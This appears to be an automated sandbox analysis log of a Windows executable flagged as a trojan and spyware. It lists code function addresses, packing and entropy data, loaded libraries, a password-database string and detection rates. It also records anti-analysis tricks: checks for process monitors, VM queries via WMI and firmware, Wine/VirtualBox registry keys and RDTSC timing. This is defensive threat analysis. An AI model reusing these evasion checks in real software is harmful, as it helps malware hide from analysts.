Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A070E0	0_2_00A070E0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC10E1	0_2_00AC10E1
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A490F1	0_2_00A490F1
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5D028	0_2_00A5D028
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009F500F	0_2_009F500F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A0D038	0_2_00A0D038
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ACF006	0_2_00ACF006
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7B009	0_2_00A7B009
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A89018	0_2_00A89018
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3D01B	0_2_00A3D01B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA706B	0_2_00AA706B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8D1B8	0_2_00A8D1B8
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A751BC	0_2_00A751BC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A9F1B7	0_2_00A9F1B7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AE1184	0_2_00AE1184
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AE91DC	0_2_00AE91DC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADF12A	0_2_00ADF12A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADB125	0_2_00ADB125
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7712E	0_2_00A7712E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5112F	0_2_00A5112F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8510E	0_2_00A8510E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A99101	0_2_00A99101
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A6710F	0_2_00A6710F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB7117	0_2_00AB7117
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB5165	0_2_00AB5165
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF1170	0_2_00AF1170
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AE314E	0_2_00AE314E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3914C	0_2_00A3914C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB115A	0_2_00AB115A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009DF169	0_2_009DF169
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A4315F	0_2_00A4315F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009E1160	0_2_009E1160
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A792A5	0_2_00A792A5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD12AE	0_2_00AD12AE
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AFD2A1	0_2_00AFD2A1
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A952BB	0_2_00A952BB
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A452E9	0_2_00A452E9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AE72FC	0_2_00AE72FC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AEF2F3	0_2_00AEF2F3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00B45238	0_2_00B45238
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADD239	0_2_00ADD239
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5520E	0_2_00A5520E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA3212	0_2_00AA3212
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A71265	0_2_00A71265
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADF26F	0_2_00ADF26F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A6B262	0_2_00A6B262
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A9D261	0_2_00A9D261
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A4D268	0_2_00A4D268
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7F268	0_2_00A7F268
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A6927D	0_2_00A6927D
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00B81258	0_2_00B81258
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009DC74B	0_2_009DC74B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5725B	0_2_00A5725B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2F3A3	0_2_00A2F3A3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3B3A7	0_2_00A3B3A7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB93AE	0_2_00AB93AE
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7B3B6	0_2_00A7B3B6
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009E3382	0_2_009E3382
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A653BA	0_2_00A653BA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3F382	0_2_00A3F382
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5F384	0_2_00A5F384
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD738F	0_2_00AD738F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD5381	0_2_00AD5381
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A93387	0_2_00A93387
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009F73DF	0_2_009F73DF
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009FF3DA	0_2_009FF3DA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7D3EC	0_2_00A7D3EC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009ED3C7	0_2_009ED3C7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A4F3DD	0_2_00A4F3DD
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AFB32B	0_2_00AFB32B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8732D	0_2_00A8732D
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7333B	0_2_00A7333B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF7330	0_2_00AF7330
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5B300	0_2_00A5B300
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA131C	0_2_00AA131C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A89314	0_2_00A89314
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009FD348	0_2_009FD348
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009F3343	0_2_009F3343
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF135C	0_2_00AF135C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009DD361	0_2_009DD361
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3735F	0_2_00A3735F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A47359	0_2_00A47359
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC14A8	0_2_00AC14A8
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AAF48A	0_2_00AAF48A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A61484	0_2_00A61484
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ABF489	0_2_00ABF489
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ACD485	0_2_00ACD485
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5D49C	0_2_00A5D49C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AED4FA	0_2_00AED4FA
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A494C6	0_2_00A494C6
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00B954CC	0_2_00B954CC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A43427	0_2_00A43427
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009CB410	0_2_009CB410
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF9423	0_2_00AF9423
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8341A	0_2_00A8341A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AAB460	0_2_00AAB460
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8547A	0_2_00A8547A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009C9440	0_2_009C9440
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A89474	0_2_00A89474
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC544C	0_2_00AC544C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A9744F	0_2_00A9744F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00B8B450	0_2_00B8B450
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A07450	0_2_00A07450
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A59454	0_2_00A59454
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A69452	0_2_00A69452
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A6F451	0_2_00A6F451
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7D5A6	0_2_00A7D5A6
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA55AD	0_2_00AA55AD
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7F5B5	0_2_00A7F5B5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB758E	0_2_00AB758E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ABD592	0_2_00ABD592
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00B7F589	0_2_00B7F589
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD95EF	0_2_00AD95EF
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009D75D3	0_2_009D75D3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AE15FB	0_2_00AE15FB
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC95DD	0_2_00AC95DD
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A715D9	0_2_00A715D9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A9952D	0_2_00A9952D
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF7502	0_2_00AF7502
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A65513	0_2_00A65513
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_009C3520	0_2_009C3520
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7956F	0_2_00A7956F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA954A	0_2_00AA954A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADF54C	0_2_00ADF54C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A4F555	0_2_00A4F555
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A81553	0_2_00A81553
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB56A5	0_2_00AB56A5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A8F6B8	0_2_00A8F6B8
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD36B7	0_2_00AD36B7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A73683	0_2_00A73683
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A37692	0_2_00A37692
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A39698	0_2_00A39698
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A7B6EC	0_2_00A7B6EC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A4B6D0	0_2_00A4B6D0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A51621	0_2_00A51621
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A57622	0_2_00A57622
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC5620	0_2_00AC5620
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A35630	0_2_00A35630
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5360E	0_2_00A5360E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ABB61C	0_2_00ABB61C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A63660	0_2_00A63660
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA366C	0_2_00AA366C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A33677	0_2_00A33677
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AF3656	0_2_00AF3656
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A057A0	0_2_00A057A0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AB17A6	0_2_00AB17A6
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AED7B3	0_2_00AED7B3
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AA579B	0_2_00AA579B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AFB79A	0_2_00AFB79A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A5979D	0_2_00A5979D
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A3579A	0_2_00A3579A
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ADD7E9	0_2_00ADD7E9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A477F5	0_2_00A477F5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A457D0	0_2_00A457D0
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A537D8	0_2_00A537D8
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00ACF72C	0_2_00ACF72C
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AD1724	0_2_00AD1724
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A95735	0_2_00A95735

Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: String function: 009DB0F0 appears 116 times
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: String function: 009CB210 appears 48 times

Source: JqGBbm7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: JqGBbm7.exe

Static PE information: Section: ZLIB complexity 0.9981260557432432

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1

Source: C:\Users\user\Desktop\JqGBbm7.exe

Code function: 0_2_009FA3E0 CoCreateInstance,

0_2_009FA3E0

Source: C:\Users\user\Desktop\JqGBbm7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: JqGBbm7.exe, 00000000.00000003.1712262838.0000000005716000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: JqGBbm7.exe	Virustotal: Detection: 69%
Source: JqGBbm7.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\JqGBbm7.exe

File read: C:\Users\user\Desktop\JqGBbm7.exe

Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: JqGBbm7.exe

Static file information: File size 2996224 > 1048576

Source: JqGBbm7.exe

Static PE information: Raw size of cmtgbjjz is bigger than: 0x100000 < 0x2a9a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\JqGBbm7.exe

Unpacked PE file: 0.2.JqGBbm7.exe.9c0000.0.unpack :EW;.rsrc:W;.idata :W;cmtgbjjz:EW;amlicovq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmtgbjjz:EW;amlicovq:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: JqGBbm7.exe

Static PE information: real checksum: 0x2e433e should be: 0x2e2fec

Source: JqGBbm7.exe	Static PE information: section name:
Source: JqGBbm7.exe	Static PE information: section name: .idata
Source: JqGBbm7.exe	Static PE information: section name: cmtgbjjz
Source: JqGBbm7.exe	Static PE information: section name: amlicovq
Source: JqGBbm7.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A274B7 push eax; mov dword ptr [esp], ebp	0_2_00A274CF
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A274B7 push 675A1D1Fh; mov dword ptr [esp], eax	0_2_00A278E5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A274B7 push 154256FBh; mov dword ptr [esp], ecx	0_2_00A281FF
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A27D72 push ebp; mov dword ptr [esp], 38F8CFCCh	0_2_00A28434
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push edi; mov dword ptr [esp], eax	0_2_00AC83F5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push 75569023h; mov dword ptr [esp], esi	0_2_00AC83FD
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push ecx; mov dword ptr [esp], 42BF80C7h	0_2_00AC8431
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push 7050F667h; mov dword ptr [esp], ebp	0_2_00AC845E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push eax; mov dword ptr [esp], ecx	0_2_00AC84F4
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push 59A839ACh; mov dword ptr [esp], eax	0_2_00AC8655
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00AC8094 push ecx; mov dword ptr [esp], esi	0_2_00AC8687
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2C033 push eax; mov dword ptr [esp], 7E2E8A86h	0_2_00A2C041
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A059 push eax; mov dword ptr [esp], 7EF6D25Bh	0_2_00A2C405
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C761A2 push 1A3D7EADh; mov dword ptr [esp], ebp	0_2_00C761BD
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A1D2 push edx; mov dword ptr [esp], ecx	0_2_00A2A3C5
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A121 push eax; mov dword ptr [esp], 055DFD93h	0_2_00A2E450
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2C104 push 650DCC59h; mov dword ptr [esp], esi	0_2_00A2C109
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2C104 push edx; mov dword ptr [esp], 7FBD0EBCh	0_2_00A2C10D
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2C104 push 2D98722Eh; mov dword ptr [esp], ebx	0_2_00A2C877
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A110 push esi; mov dword ptr [esp], 154B8EF5h	0_2_00A2E5B1
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C4E177 push 0D5B418Dh; mov dword ptr [esp], ebx	0_2_00C4E1A9
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C4E177 push ebx; mov dword ptr [esp], 5456AA98h	0_2_00C4E1CC
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C4E177 push 0AC36222h; mov dword ptr [esp], eax	0_2_00C4E234
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C40179 push edx; mov dword ptr [esp], edi	0_2_00C40190
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C40179 push esi; mov dword ptr [esp], 74AEB000h	0_2_00C4019E
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C40179 push esi; mov dword ptr [esp], edi	0_2_00C40269
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A2A3 push edx; mov dword ptr [esp], ecx	0_2_00A2B5A7
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A28D push 6D34B035h; mov dword ptr [esp], edx	0_2_00A2C36B
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2C2E3 push 7FDF92AEh; mov dword ptr [esp], edx	0_2_00A2CB7F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00C0C25A push 6090D614h; mov dword ptr [esp], esi	0_2_00C0C29F
Source: C:\Users\user\Desktop\JqGBbm7.exe	Code function: 0_2_00A2A20C push 0F90CE5Ch; mov dword ptr [esp], edx	0_2_00A2A64E

Source: JqGBbm7.exe

Static PE information: section name: entropy: 7.987624463356723

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\JqGBbm7.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\JqGBbm7.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: A26BF6 second address: A26BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JqGBbm7.exe	RDTSC instruction interceptor: First address: B9B9AE second address: B9B9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC064DA37BCh 0x00000009 rdtsc
